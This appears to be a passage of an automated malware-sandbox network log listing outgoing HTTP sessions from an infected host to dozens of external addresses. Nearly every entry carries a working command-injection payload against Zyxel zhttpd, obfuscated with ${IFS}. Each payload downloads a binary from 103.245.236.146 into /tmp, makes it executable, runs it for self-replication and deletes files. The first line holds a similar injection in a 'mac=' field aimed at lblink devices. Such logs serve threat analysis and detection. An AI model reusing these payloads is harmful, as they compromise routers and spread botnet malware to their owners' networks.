                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:23:50.021388054 CET279INHTTP/1.0 400 Bad request
                                                  Server: Zscaler/6.2
                                                  Content-Type: text/html
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br></p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2912192.168.2.1347468177.230.200.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.933429956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2913192.168.2.134160420.86.42.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.933473110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2914192.168.2.13480325.238.52.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.933506966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2915192.168.2.1356684108.95.253.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.933564901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2916192.168.2.135176472.254.32.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.933597088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2917192.168.2.1350424159.25.194.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.933633089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2918192.168.2.1332976186.83.15.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.933682919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2919192.168.2.134583636.137.179.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.933739901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2920192.168.2.133992088.186.231.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.933783054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2921192.168.2.135020283.134.138.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.933830976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2922192.168.2.135755419.181.251.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.933864117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2923192.168.2.1359764206.210.173.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.933882952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2924192.168.2.135808069.174.75.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.933912992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2925192.168.2.135926867.145.96.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.933954000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2926192.168.2.135685866.111.200.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.933981895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2927192.168.2.135074069.200.162.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934042931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2928192.168.2.1355298164.247.38.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934084892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2929192.168.2.1340922189.154.141.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934115887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2930192.168.2.1340988191.15.127.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934146881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2931192.168.2.133501873.231.181.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934197903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2932192.168.2.1332836114.75.155.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934238911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2933192.168.2.133468696.226.238.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934293032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2934192.168.2.1341806206.29.187.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934319019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2935192.168.2.1358418115.47.249.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934354067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2936192.168.2.1351474106.44.48.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934402943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2937192.168.2.1335332222.122.146.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934451103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2938192.168.2.133897244.93.164.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934494019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2939192.168.2.1355990162.83.6.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934521914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2940192.168.2.1354242174.20.191.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934573889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2941192.168.2.1339518136.32.158.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934600115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2942192.168.2.1333850196.255.135.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934650898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2943192.168.2.1359420135.55.177.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934688091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2944192.168.2.1343082212.140.8.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934747934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2945192.168.2.1351416108.34.118.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934797049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2946192.168.2.1350004126.67.155.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934854984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2947192.168.2.1356846199.184.167.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934911013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2948192.168.2.1335692123.245.87.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934930086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2949192.168.2.136054612.159.75.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.934984922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2950192.168.2.1345586211.13.198.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935019970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2951192.168.2.1337144113.96.49.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935069084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2952192.168.2.1355312144.165.233.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935098886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2953192.168.2.134494235.220.205.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935123920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2954192.168.2.1350040183.255.248.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935161114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2955192.168.2.135316875.145.252.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935209036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2956192.168.2.1337884143.106.14.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935261965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2957192.168.2.13472289.254.65.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935308933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2958192.168.2.1358990158.88.101.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935343027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2959192.168.2.1334022138.179.223.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935379028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2960192.168.2.134357692.244.85.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935400963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2961192.168.2.1337764121.147.141.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935472965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2962192.168.2.1336772109.128.147.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935502052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2963192.168.2.1356188193.112.64.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935538054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2964192.168.2.135122871.154.223.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935585022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2965192.168.2.1354916168.108.60.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935605049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2966192.168.2.1339442123.84.66.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935642004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2967192.168.2.134585234.82.52.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935693026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2968192.168.2.1348780162.149.124.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935725927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2969192.168.2.135123889.198.150.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935762882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2970192.168.2.1355134177.143.222.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935791016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2971192.168.2.134590080.46.173.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935822010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2972192.168.2.135901282.230.142.59443
